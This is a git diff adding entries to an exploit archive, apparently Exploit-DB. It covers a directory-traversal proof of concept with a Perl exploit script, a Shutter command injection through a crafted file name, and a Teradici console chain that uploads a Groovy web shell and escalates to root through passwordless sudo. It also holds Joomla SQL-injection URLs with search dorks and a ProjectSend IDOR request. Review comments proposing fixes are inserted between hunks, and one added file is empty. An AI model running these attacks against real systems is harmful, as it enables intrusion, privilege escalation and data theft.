diff --git a/files.csv b/files.csv
index 6ad985f3f..f585a64e1 100644
--- a/files.csv
+++ b/files.csv
@@ -5379,6 +5379,9 @@ id,file,description,date,author,platform,type,port
41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
+41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
+41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
+41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8813,6 +8816,7 @@ id,file,description,date,author,platform,type,port
41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
41349,platforms/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Privilege Escalation",2017-02-14,"Kacper Szurek",windows,local,0
41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
+41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15279,7 +15283,7 @@ id,file,description,date,author,platform,type,port
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
-41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
+41146,platforms/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0
41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0
@@ -15291,6 +15295,7 @@ id,file,description,date,author,platform,type,port
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
+41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37341,3 +37346,11 @@ id,file,description,date,author,platform,type,port
41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
+41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41430,platforms/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41431,platforms/php/webapps/41431.txt,"Joomla! Component MediaLibrary Basic 3.5 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
+41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
+41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
diff --git a/platforms/ios/webapps/41432.txt b/platforms/ios/webapps/41432.txt
new file mode 100755
index 000000000..a5e4eb997
--- /dev/null
+++ b/platforms/ios/webapps/41432.txt
@@ -0,0 +1,205 @@
+Document Title:
+===============
+Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2032
+
+
+Release Date:
+=============
+2017-02-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2032
+
+
+Common Vulnerability Scoring System:
+====================================
+7.8
+
+
+Product & Service Introduction:
+===============================
+You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store
+and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do
+more things in one app and manage your life better!
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/lock-photos-album-video.s/id448033053 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-02-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Galaxy Studio (Mo Wellin)
+Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A directory traversal vulnerability has been dsicovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
+The security vulnerability allows an attackers to unauthorized request and download local application files by usage of manipulated path parameters.
+
+The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request
+the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path
+variables to access, download or upload arbitrary files. Remote attackers are able to access the sql-lite database file that own the web-server
+access credentials of the application. After the download the attacker is able to access the database management system file to use the credentials
+for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check
+for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application.
+The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able
+to access with the credentials the service by using a client via http protocol.
+
+The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8.
+Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
+vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] PRE
+
+Vulnerable Parameter(s):
+[+] form action
+
+Affected Module(s):
+[+] Web-Server File System
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Standard Request:
+http://localhost:5555/?PRE=action form
+
+
+PoC: Payload
+//..//..//..//..//..//..//..//..//%00
+/../../../../../../../../%00
+
+
+PoC: Exploitation
+http://localhost:5555/?PRE=action form=/../../../../../../../../%00
+
+
+PoC: Exploit
+use strict;
+use LWP::UserAgent;
+my $b = LWP::UserAgent->new();
+my $host = "localhost:5555";
+print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:5555/?PRE=action%20form=//..//..//..//..//..//..//..//..//%00 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:5555]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Connection[keep-alive]
+ Upgrade-Insecure-Requests[1]
+ Response Header:
+ Date[Di., 21 Feb. 2017 09:21:48 GMT]
+ Accept-Ranges[bytes]
+ Content-Length[0]
+
+
+
+
+PoC: Vulnerable Source
+{
+ "paths" : [
+ "/Picture/Public/path/All Image/"
+ ],
+ "folder" : "/Picture/Public/path",
+ "code" : 1
+}
+... manipulated
+
+{
+ "paths" : [
+ ],
+ "folder" : "/../../../../../../../../%00",
+ "code" : 1
+}
+
+
+Reference(s):
+http://localhost:5555/
+http://localhost:5555/?PRE
+
+
+Solution - Fix & Patch:
+=======================
+The security vulnerability can be resolved by disallowing users to access the upper path for root privileges. Ensure that the form
+action request denies to access web-server data or application configuration files. Parse and restrict the form action parameter to
+prevent further directory traversal attacks.
+
+
+Security Risk:
+==============
+The security risk of the directory traversal web vulnerability in the mobile web-server application is estimated as high. (CVSS 7.8)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+ Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
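Review bot: The session log under `--- PoC Session Logs [GET] ---` records `Status: 200[OK]` with `Content-Length[0]`, so nothing in the advisory shows file content being returned for the traversal path; the claim that the SQLite credential database can be downloaded is asserted but not evidenced. The `Solution - Fix & Patch` section is also too loose to act on, since "disallowing users to access the upper path for root privileges" does not say what the server must check. I would reword it along the lines of `Resolve the requested folder to its canonical path, reject requests containing an encoded NUL byte, and serve the folder only if the result is still inside the shared document root; require authentication on the wifi web-server before any file request.` The stated CVSS score of 7.8 comes without a vector string, which makes it hard to verify.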
diff --git a/platforms/linux/local/41435.txt b/platforms/linux/local/41435.txt
new file mode 100755
index 000000000..bb18d0f3b
--- /dev/null
+++ b/platforms/linux/local/41435.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Shutter user-assisted remote code execution
+# Date: 2016-12-26
+# Software Link: http://shutter-project.org/
+# Version: 0.93.1
+# Tested on: Ubuntu, Debian
+# Exploit Author: Prajith P
+# Website: http://prajith.in/
+# Author Mail: me@prajith.in
+# CVE: CVE-2016-10081
+
+1. Description.
+ /usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
+attackers to execute arbitrary commands via a crafted image name that is
+mishandled during a "Run a plugin" action.
+
+2. Proof of concept.
+ 1) Rename an image to something like "$(firefox)"
+ 2) Open the renamed file in shutter
+ 3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
+
+3. Solution:
+ https://bugs.launchpad.net/shutter/+bug/1652600
+
+
+Thanks,
+Prajithh
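Review bot: The `3. Solution:` section gives only the Launchpad bug link and names neither a fixed release nor a workaround, so a reader on Shutter 0.93.1 cannot tell from the entry what to do. The file name in step 1 of the proof of concept suggests the image path reaches a shell command line unquoted when a plugin is run (inferred from the PoC; the plugin-launch code is not shown), and `1. Description.` should state that root cause. I would add a line such as `Workaround: until a fixed package is installed, do not use "Run a plugin" on files whose names you did not choose.` The header title says "user-assisted remote code execution" while the entry is filed under `platforms/linux/local`; one of the two should change so the classification is consistent.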
diff --git a/platforms/linux/webapps/41437.txt b/platforms/linux/webapps/41437.txt
new file mode 100755
index 000000000..f5944f271
--- /dev/null
+++ b/platforms/linux/webapps/41437.txt
@@ -0,0 +1,66 @@
+# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
+# Date: February 22nd, 2017
+# Exploit Author: hantwister
+# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
+# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
+# Version: 2.2.0
+
+
+Users that can access the Settings > Database Management page can achieve code
+execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
+
+
+Web Shell Upload Vulnerability Overview
+---------------------------------------
+
+Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
+malicious archive with a malicious web script that extracts to the known
+directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
+it is possible to add or modify class files and XML files pertaining to the
+application.
+
+
+Privilege Escalation Vulnerability Overview
+-------------------------------------------
+
+The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
+has sudo rights to run that file without a password. By manipulating this file,
+arbitrary code can be run as root.
+
+
+Exploiting The Vulnerabilities
+------------------------------
+
+alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
+alice:~$ cd runasroot
+alice:~/runasroot$ msfvenom (snip) > evil
+alice:~/runasroot$ chmod a+x evil
+alice:~/runasroot$ nano modify_self_restart.sh
+
+#!/bin/bash
+echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
+
+alice:~/runasroot$ chmod a+x modify_self_restart.sh
+alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
+alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
+
+
+
+runasroot
+
+
+
+<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
+<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
+<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
+
+
+
+
+alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
+alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
+alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
+
+Now, choose to upload runasroot.archive through the Database Management page. An
+error will be displayed that it wasn't a valid archive. Now, navigate to
+https://IP/console/images/runasroot.gsp
\ No newline at end of file
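Review bot: The write-up has no remediation section and gives the affected range only as "older versions of PCoIP MC 2.x", so an administrator cannot tell which release is safe or what to check on an installed console. Both root causes are named in the overviews and translate directly into checks: archive contents land under `/opt/jetty/tmpdeploy` apparently even when the upload is reported as invalid, and `/opt/jetty/jetty_self_restart.sh` is owned by the same `jetty` user that may run it through passwordless sudo. I would add a closing section, e.g. `Mitigation: upgrade to [FIXED_VERSION]; make jetty_self_restart.sh root-owned and not writable by jetty; restrict who can reach Settings > Database Management.` The `openssl enc` step also implies the console accepts archives encrypted with a fixed passphrase, which deserves its own sentence in the overview if that is the case. The file ends without a trailing newline.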
diff --git a/platforms/multiple/dos/41434.html b/platforms/multiple/dos/41434.html
new file mode 100755
index 000000000..0041455a6
--- /dev/null
+++ b/platforms/multiple/dos/41434.html
@@ -0,0 +1,29 @@
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/41427.txt b/platforms/php/webapps/41427.txt
new file mode 100755
index 000000000..81f688272
--- /dev/null
+++ b/platforms/php/webapps/41427.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component ContentMap v1.3.8 - SQL Injection
+# Google Dork: inurl:index.php?option=com_contentmap
+# Date: 22.02.2017
+# Vendor Homepage: https://www.turismo.eu/
+# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/contentmap/
+# Demo: https://www.turismo.eu/itinerari.html
+# Version: 1.3.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL]
+# # # # #
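Review bot: None of the five Joomla! component entries added here (41427.txt, and likewise 41428.txt through 41431.txt) says whether the vendor was notified or whether a fixed release exists, so a site owner running the listed version learns only that a parameter is injectable. I would add two header lines to each, `# Vendor Status: [notified / not notified, date]` and `# Fixed in: [version, or "no fix at time of writing"]`. The `# Demo:` lines point at third-party live sites rather than a local test install, which sits poorly beside the `http://localhost/[PATH]/` convention used for the request lines. In 41431.txt the header also names the BookLibrary component under a MediaLibrary title, apparently carried over from 41430.txt, and should be checked against the author's original.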
diff --git a/platforms/php/webapps/41428.txt b/platforms/php/webapps/41428.txt
new file mode 100755
index 000000000..81394434b
--- /dev/null
+++ b/platforms/php/webapps/41428.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
+# Google Dork: inurl:index.php?option=com_vehiclemanager
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
+# Demo: http://ordasvit.com/joomla-vehicle-manager/
+# Version: 3.9
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41429.txt b/platforms/php/webapps/41429.txt
new file mode 100755
index 000000000..6705d296e
--- /dev/null
+++ b/platforms/php/webapps/41429.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
+# Google Dork: inurl:index.php?option=com_realestatemanager
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
+# Demo: http://ordasvit.com/joomla-real-estate-manager/
+# Version: 3.9
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
+# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41430.txt b/platforms/php/webapps/41430.txt
new file mode 100755
index 000000000..999291a00
--- /dev/null
+++ b/platforms/php/webapps/41430.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_booklibrary
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
+# Demo: http://ordasvit.com/joomla-book-library
+# Version: 3.6.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
+# http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
+# # # # #
diff --git a/platforms/php/webapps/41431.txt b/platforms/php/webapps/41431.txt
new file mode 100755
index 000000000..8ec856478
--- /dev/null
+++ b/platforms/php/webapps/41431.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
+# Google Dork: inurl:index.php?option=com_booklibrary
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
+# Demo: http://ordasvit.com/joomla-media-library/
+# Version: 3.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
+# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41433.txt b/platforms/php/webapps/41433.txt
new file mode 100755
index 000000000..67bec8174
--- /dev/null
+++ b/platforms/php/webapps/41433.txt
@@ -0,0 +1,157 @@
+Document Title:
+===============
+ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2031
+
+
+Release Date:
+=============
+2017-02-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2031
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Product & Service Introduction:
+===============================
+ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets
+you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending
+on external services or e-mail to send those files.
+
+(Copy of the Homepage: http://www.projectsend.org/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-02-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+GNU GPL License
+Product: ProjectSend r754
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input.
+As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References
+allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point
+to other client account names, which allows an attackers to download others clients private data with no secure method provided.
+
+Vulnerability Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] process.php?do=zip_download
+
+Vulnerable Parameter(s):
+[+] client
+[+] file
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ...
+
+2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension
+
+--- PoC Session Logs ---
+GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost/ProjectSend-r754/my_files/
+Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
+Connection: keep-alive
+-
+HTTP/1.1 200 OK
+Date: Sun, 05 Feb 2017 19:07:41 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.44-0+deb7u1
+Expires: Sat, 26 Jul 1997 05:00:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, max-age=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+Content-Length: 6
+
+Name of Files: .jpg
+
+
+Video PoC:
+https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
+
+
+Security Risk:
+==============
+The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. (CVSS 5.3)
+
+
+Credits & Authors:
+==================
+Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) (https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
